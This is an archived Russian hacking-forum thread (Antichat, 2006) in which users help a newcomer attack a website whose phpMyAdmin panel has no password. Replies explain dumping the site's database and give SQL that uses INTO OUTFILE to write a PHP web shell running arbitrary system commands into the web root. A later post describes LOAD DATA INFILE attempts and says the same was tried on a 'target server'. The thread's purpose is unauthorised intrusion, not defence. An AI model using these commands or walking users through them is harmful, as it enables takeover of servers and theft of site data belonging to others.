Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)
-   -   Как залить шелл через PhpMyAdmin? (https://forum.antichat.xyz/showthread.php?t=14477)

Buga 15.02.2006 01:01

Как залить шелл через PhpMyAdmin?
 
не знал куда писать но напигу сюда.
кароче есть форум на сайте ну это фигня там другая фигня.. например:я пишу http://xxx.xxx.ru/admin/ он мне сразу зашол
[Добро пожаловать в phpMyAdmin 2.4.0

MySQL 4.1.11 на localhost как xxx@localhost] не попросил не каких паролей не чо как нибудь можно скачать БД ? :confused:

Ak3lla 15.02.2006 01:12

Да, можно ;)

Grrl 15.02.2006 01:21

ну это воще странно что тебя теда впустили без пасов.. повезло)
естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит .
слева выбирааешь нужные базы и днлаешь дамп (экспорт).

qPhoenix 15.02.2006 07:03

Цитата:

Сообщение от Grrl
ну это воще странно что тебя теда впустили без пасов.. повезло)
естественно имея доступ к pma можешь делать с базой что угодно редактировать таблицы и естествеено сделать дамп нужной базы.еще можно попробовать залить шел если прав хватит .
слева выбирааешь нужные базы и днлаешь дамп (экспорт).

Прости, быть может не правильно понял смысл... через МиСКЛю можно лить шеллы? как? :eek:

podkashey 15.02.2006 12:00

Цитата:

Прости, быть может не правильно понял смысл... через МиСКЛю можно лить шеллы? как?
Если ничего не путаю, то надо сделать дамп базы, изменить несколько (или даже одну) строк и залить обратно.
Если правильно понял твой вопрос.

Buga 15.02.2006 19:17

блин я в этом phpAdmine не Шарю как там куда захадить то надо ?? там кароче с лева написано
БД отсутствуют и есть MySQL Создать новую БД и всякой разной Хрени как залить шел ?? поясните Ньюбу :p

virgoz 15.02.2006 21:35

2qPhoenix, Buga выполняем эти команды:
Цитата:

UPDATE table SET column='<? system("$cmd"); ?>' WHERE id='0';
SELECT name FROM table WHERE id='0' INTO OUTFILE '/path/to/file/shell.php';
UPDATE table SET column='nothing' WHERE id='0';
Шелл будет в /path/to/file/shell.php

Buga 15.02.2006 21:42

апять я запутался я же навичок.
где и как их выполнить ? :confused:

Grrl 16.02.2006 02:31

где выполнять? ну даешь... там в майадмине есть такая ссылка вверху "SQL"
жмешь ее потом откроется форма в ней пишешь sql запрос и внизу жмешь кнопку "пошел" или "submit" или чо там у теебя..

qPhoenix 16.02.2006 10:27

WinXP, MySQL 4.1.18-nt, таблица 'lol' c текстовым столбцом 'txt', работаю MySQL Query Browser 1.1.20, админки нет (на целевом)
Пасяб virgoz за идею, правда всего так и не понял =)

Приступим:
Загоняем шелл в таблу: LOAD DATA INFILE 'e:/shell/nst.php' INTO TABLE lol; гуд! 2103 строк записано...
Вынимаем на локалхост: SELECT * FROM lol INTO OUTFILE 'd:/http/shell.php'; гуд! 2103 строк записано...
Запускаю - белый экран, исходный код - пусто...
Сравниваю шеллы:
Исходник - 82*940 байт/2103 строк
Созданый - 82*547 байт/2156 строк
пробую прогнать сие еще 3-4 раза и впадаю в отчаяние...

Плз, втолкуйте в чем ошибка, и желательно поскорее, бо на целевом серваке я тож пару раз проверил... :rolleyes:


Время: 07:19